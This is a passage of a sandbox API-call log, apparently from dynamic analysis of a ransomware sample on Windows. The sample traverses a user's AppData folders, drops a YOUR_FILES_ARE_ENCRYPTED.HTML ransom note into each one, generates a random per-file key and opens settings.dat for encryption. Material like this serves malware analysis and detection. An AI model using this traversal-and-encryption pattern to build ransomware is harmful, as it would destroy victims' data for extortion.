(lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0121.682] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0121.683] CloseHandle (hObject=0x324) returned 1 [0121.683] GetProcessHeap () returned 0x600000 [0121.683] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.683] GetProcessHeap () returned 0x600000 [0121.683] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0121.683] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x905ddec2, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x90d3d67e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x90d3d67e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f8190, dwReserved1=0x6f80b0, cFileName="en-US", cAlternateFileName="")) returned 0 [0121.683] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0121.683] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 150 [0121.683] GetProcessHeap () returned 0x600000 [0121.683] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0121.684] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0121.685] CloseHandle (hObject=0x320) returned 1 [0121.685] GetProcessHeap () returned 0x600000 [0121.685] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.685] GetProcessHeap () returned 0x600000 [0121.685] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0121.686] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x905ddec2, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x905ddec2, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x905ddec2, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f6218, dwReserved1=0x63d098, cFileName="Settings", cAlternateFileName="")) returned 0 [0121.686] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0121.686] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0121.686] GetProcessHeap () returned 0x600000 [0121.686] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.687] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.689] WriteFile (in: hFile=0x338, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.690] CloseHandle (hObject=0x338) returned 1 [0121.690] GetProcessHeap () returned 0x600000 [0121.690] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.690] GetProcessHeap () returned 0x600000 [0121.690] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.691] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x905ddec2, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x905ddec2, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x905ddec2, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="Indexed", cAlternateFileName="")) returned 0 [0121.691] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.691] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0121.691] GetProcessHeap () returned 0x600000 [0121.691] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.692] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.697] CloseHandle (hObject=0x31c) returned 1 [0121.697] GetProcessHeap () returned 0x600000 [0121.697] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.698] GetProcessHeap () returned 0x600000 [0121.698] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.698] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0121.698] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.698] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState") returned 105 [0121.698] GetProcessHeap () returned 0x600000 [0121.698] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.698] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState" [0121.698] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState\\*" [0121.698] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.698] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0121.698] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0121.698] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.698] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 135 [0121.698] GetProcessHeap () returned 0x600000 [0121.698] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.698] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.699] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.700] CloseHandle (hObject=0x31c) returned 1 [0121.700] GetProcessHeap () returned 0x600000 [0121.700] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.700] GetProcessHeap () returned 0x600000 [0121.700] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.700] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efcf224, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efcf224, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0121.700] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.700] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings") returned 101 [0121.700] GetProcessHeap () returned 0x600000 [0121.700] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.700] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings" [0121.700] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\*" [0121.700] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efcf224, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x94853701, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0121.702] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efcf224, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x94853701, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0121.702] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5efcf224, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efcf224, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efcf224, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0121.702] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.702] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\roaming.lock") returned 114 [0121.702] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0121.702] lstrlenW (lpString=".lock") returned 5 [0121.702] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0121.702] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5efcf224, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x94a69826, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x94a69826, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0121.702] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.702] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat") returned 114 [0121.702] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0121.702] lstrlenW (lpString=".dat") returned 4 [0121.702] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0121.702] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0121.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0121.703] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0121.703] GetProcessHeap () returned 0x600000 [0121.703] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0121.705] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="37") returned 2 [0121.705] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="4F") returned 2 [0121.705] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="BA") returned 2 [0121.705] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="3C") returned 2 [0121.705] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="DD") returned 2 [0121.705] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="A3") returned 2 [0121.705] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="4E") returned 2 [0121.705] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="96") returned 2 [0121.705] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="9B") returned 2 [0121.705] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="B4") returned 2 [0121.705] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="FB") returned 2 [0121.705] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="5E") returned 2 [0121.705] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="2D") returned 2 [0121.706] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="F5") returned 2 [0121.706] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="08") returned 2 [0121.706] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="9C") returned 2 [0121.706] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="A2") returned 2 [0121.706] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="D2") returned 2 [0121.706] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="78") returned 2 [0121.706] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="29") returned 2 [0121.706] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="2D") returned 2 [0121.706] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="9A") returned 2 [0121.706] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="DC") returned 2 [0121.706] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="6F") returned 2 [0121.706] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="64") returned 2 [0121.706] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="89") returned 2 [0121.706] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="30") returned 2 [0121.706] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="90") returned 2 [0121.706] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="FF") returned 2 [0121.706] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="BF") returned 2 [0121.706] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="19") returned 2 [0121.706] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="74") returned 2 [0121.706] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat" [0121.706] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0121.707] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0121.707] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x94794b2d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x94794b2d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x94794b2d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0121.707] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.707] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat.LOG1") returned 119 [0121.707] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0121.707] lstrlenW (lpString=".LOG1") returned 5 [0121.707] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0121.707] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x947bac6a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x947bac6a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x947bac6a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0121.707] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.707] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat.LOG2") returned 119 [0121.707] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0121.707] lstrlenW (lpString=".LOG2") returned 5 [0121.707] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0121.707] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x947bac6a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x947bac6a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x947bac6a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0121.707] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0121.707] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: 